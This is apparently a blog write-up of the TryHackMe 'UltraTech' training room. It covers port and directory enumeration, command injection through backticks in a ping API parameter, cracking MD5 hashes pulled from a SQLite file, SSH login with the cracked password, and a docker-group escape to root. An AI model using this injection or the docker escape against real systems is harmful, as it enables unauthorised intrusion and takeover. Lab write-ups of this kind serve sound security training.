Open in app

Sign in

Write

Sign in

TryHackMe | UltraTech

FarisArch
2 min readMay 2, 2021

A TryHackMe room that involves the basics of penetration testing, enumeration, privilege escalation and webapp testing.

Ultratech

Tasks

  • Identify software on ports.
  • Identify OS
  • Identify routes of web app.
  • Find database name
  • Find credentials
  • Get private SSH key.

Vulnerabilities

  • API is not secure.Should practice least privilege.
  • Weak password.

Nmap

Discovered open port 21/tcp on 10.10.112.55 vsftpd 3.0.3
Discovered open port 22/tcp on 10.10.112.55 opensh 7.6p1
Discovered open port 8081/tcp on 10.10.112.55 Node.js
Discovered open port 31331/tcp on 10.10.122.55 Apache

I used tag -v to print out the open ports when found.

Gobuster

  • Navigate to the apache web server on port 31331.
  • Let’s find a directory that we can exploit.
/images               (Status: 301) [Size: 322]/index.html           (Status: 200) [Size: 6092]                                       
/index.html           (Status: 200) [Size: 6092]                                       
/javascript           (Status: 301) [Size: 326] /js                   (Status: 301) [Size: 318
  
/partners.html        (Status: 200) [Size: 1986]                                           
/robots.txt           (Status: 200) [Size: 53]                                             
/robots.txt           (Status: 200) [Size: 53]                                             
/server-status        (Status: 403) [Size: 303]                                          
/what.html            (Status: 200) [Size: 2534]

Foothold

  • We can navigate to the login page at /partners.html
  • Brute-forcing the login page doesn’t work since we don’t have credentials.
  • Looking at the Network Traffic it seems the API is performing code execution.
http://10.10.112.55:8081/ping?ip=10.10.112.55
  • Tinkering a bit with the value, it can perform unix code execution.
10.10.112.55:8081/ping?ip=`ls`
ping: utech.db.sqlite: Name or service not known
  • Let’s cat out the credentials in utech.db.sqlite
(Mr00tf357a0c52799563c7c7b76c1e7543a32)Madmin0d0ea5111e3c1def594c1684e3b9be84
  • hashid confirms it is MD variant.
  • The hash was cracked using rockyou.txt as n100906
  • We are able to SSH into the server using r00t:n100906

Privesc

  • User is not able to run sudo
r00t@ultratech-prod: sudo -l
Sorry, user r00t may not run sudo on this machine.
  • Use linpeas to enumerate.
uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker)
  • We are apart of the docker group, perhaps there is an entry for it on GTFObins.
./docker run -v /:/mnt --rm -it alpine chroot /mnt sh
  • Alpine will be the image, but since there isn’t one locally, we’ll list out images that are available in the machine.
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS                     PORTS               NAMES
7beaaeecd784        bash                "docker-entrypoint.s…"   2 years ago         Exited (130) 2 years ago                       unruffled_shockley
696fb9b45ae5        bash                "docker-entrypoint.s…"   2 years ago         Exited (127) 2 years ago                       boring_varahamihira
9811859c4c5c        bash                "docker-entrypoint.s…"   2 years ago         Exited (127) 2 years ago                       boring_volhard
  • Now let’s run that with docker
docker run -v /:/mnt --rm -it bash chroot /mnt sh
  • And now we are root.
  • Head over to the root directory and .ssh to find the private key.
Tryhackme
Hacking
Web
Technology
Privilege Escalation

--

--

FarisArch

Written by FarisArch

33 Followers

Cat lover that can blue team.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams